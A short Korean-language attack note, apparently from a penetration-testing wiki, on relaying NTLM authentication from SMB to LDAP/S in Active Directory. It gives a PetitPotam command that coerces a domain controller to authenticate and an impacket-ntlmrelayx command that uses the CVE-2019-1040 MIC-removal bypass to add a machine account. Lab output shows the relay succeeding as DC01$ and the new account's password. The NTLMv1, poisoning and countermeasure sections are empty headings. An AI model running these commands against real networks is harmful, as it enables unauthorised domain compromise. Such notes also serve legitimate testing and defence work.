SMB to LDAP/S
조건
NTLMv2 SMB -> LDAP(S)
트리거 - 강제 인증 - Petitpotam
python3 PetitPotam.py -u '' -p '' 192.168.40.132 192.168.40.150트리거- LLMNR/NBT-NS 포이즈닝
릴레이 - CVE-2019-1040에 취약할 경우
impacket-ntlmrelayx -t ldap://192.168.40.160 -smb2support --add-computer --no-dump --no-da --no-acl --no-validate-privs --remove-mic
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.40.150, attacking target ldap://192.168.40.160
[*] Authenticating against ldap://192.168.40.160 as CHOI/DC01$ SUCCEED
[*] Adding new computer with username: UAZZYGGM$ and password: lEE_wdrh2JD7T!M result: OKNTLMv1 SMB -> LDAP(S)
트리거 - 강제 인증 - Print Spooler
트리거 - LLMNR/NBT-NS 포이즈닝
릴레이
대응 방안

Last updated